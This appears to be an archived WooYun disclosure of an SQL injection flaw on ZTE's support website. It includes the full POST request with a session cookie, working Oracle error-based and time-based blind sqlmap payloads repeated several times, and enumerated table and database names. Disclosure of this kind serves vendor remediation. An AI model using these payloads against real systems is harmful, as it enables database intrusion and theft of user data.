乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-09: 细节已通知厂商并且等待厂商处理中 2015-07-09: 厂商已经确认,细节仅向厂商公开 2015-07-19: 细节向核心白帽子及相关领域专家公开 2015-07-29: 细节向普通白帽子公开 2015-08-08: 细节向实习白帽子公开 2015-08-23: 细节向公众公开
注入:POST /support/user/ProductList.aspx?_xml=a HTTP/1.1Host: support.zte.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0Accept: */*Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://support.zte.com.cn/support/user/ProductList.aspx?type=2Content-Length: 66Cookie: ZTE_lang=zh-cn; ASP.NET_SessionId=kmryp045g4o5ly45bjhg25jx; ztesupportloginname=qweea123; SptUserID=1973227Connection: keep-alivePragma: no-cacheCache-Control: no-cachewriter=productSearch&product=123&one=&two=&three=&four=&pageType=2
参数:product
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: product (POST) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) Payload: writer=productSearch&product=123') AND 8473=CTXSYS.DRITHSX.SN(8473,(CHR(113)||CHR(112)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (8473=8473) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(122)||CHR(113))) AND ('rWTm' LIKE 'rWTm&one=&two=&three=&four=&pageType=2 Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: writer=productSearch&product=123') AND 9832=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('etVH' LIKE 'etVH&one=&two=&three=&four=&pageType=2---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Oraclecurrent schema (equivalent to database on Oracle): 'NEW_SUPPORT'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: product (POST) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) Payload: writer=productSearch&product=123') AND 8473=CTXSYS.DRITHSX.SN(8473,(CHR(113)||CHR(112)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (8473=8473) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(122)||CHR(113))) AND ('rWTm' LIKE 'rWTm&one=&two=&three=&four=&pageType=2 Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: writer=productSearch&product=123') AND 9832=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('etVH' LIKE 'etVH&one=&two=&three=&four=&pageType=2---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: OracleDatabase: NEW_SUPPORT[43 tables]+--------------------------------+| ACCEPTEMAIL || BAK2_ZTESPT_BASIC_USERINFO || BAK_ZTESPT_BASIC_FTPS || BAK_ZTESPT_BASIC_USERINFO || BAK_ZTESPT_BASIC_USERINFO1 || BAK_ZTESPT_DOC_APPLY || BAK_ZTESPT_DOC_APPLYDEPT || BAK_ZTESPT_DOC_TECH || BAK_ZTESPT_SOFT_FILE || CR_REPORTS || SPT_ATTACHMENT || SPT_KL_BAK_JIANTING || SPT_KL_GE || ZTESPT_BASIC_AUTHORIZE_SCOPE || ZTESPT_BASIC_NEWS || ZTESPT_BASIC_PRODUCT_V || ZTESPT_BASIC_TYPE || ZTESPT_BASIC_USERINFO || ZTESPT_BASIC_USERINFO_BAK || ZTESPT_BASIC_USERINFO_BAK2 || ZTESPT_CUSTOMER_PRODUCTPDM_TMP || ZTESPT_CUSTOMER_PRODUCT_TMP || ZTESPT_EMAIL_LOG || ZTESPT_FORUM_REPEAT || ZTESPT_FORUM_TOPIC || ZTESPT_KLS_DIFF_EN_QSP || ZTESPT_KLS_DIFF_QSP || ZTESPT_NETSRV_FEEDBACK || ZTESPT_NETSRV_USERIDEA || ZTESPT_OTHER_HELP || ZTESPT_OTHER_HOTLINE || ZTESPT_OTHER_QWCLIENT || ZTESPT_OTHER_QWCUSTOMER || ZTESPT_PARTNERDOC_TSMFOLDER_TP || ZTESPT_PRM_USERINFO || ZTESPT_QW_SCENEQUESTIONS || ZTESPT_SENDMAIL || ZTESPT_SM || ZTESPT_SOFT_FILE || ZTESPT_SOFT_REPLACE || ZTESPT_SUBSCRIBE_PRODUCT || ZTESPT_USER_EMAIL || ZTESPT_VERUPGRADE_SUBSCRIBE |+--------------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: product (POST) Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) Payload: writer=productSearch&product=123') AND 8473=CTXSYS.DRITHSX.SN(8473,(CHR(113)||CHR(112)||CHR(98)||CHR(120)||CHR(113)||(SELECT (CASE WHEN (8473=8473) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(107)||CHR(118)||CHR(122)||CHR(113))) AND ('rWTm' LIKE 'rWTm&one=&two=&three=&four=&pageType=2 Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: writer=productSearch&product=123') AND 9832=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('etVH' LIKE 'etVH&one=&two=&three=&four=&pageType=2---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Oracleavailable databases [13]:[*] APEX_030200[*] CALLCENTER[*] CTXSYS[*] ECC_CSC[*] ENSUPPORT[*] EXFSYS[*] MDSYS[*] NEW_SUPPORT[*] OLAPSYS[*] SUPPORT[*] SYS[*] SYSTEM[*] XDB
参数过滤
危害等级:高
漏洞Rank:18
确认时间:2015-07-09 18:47
感谢~
暂无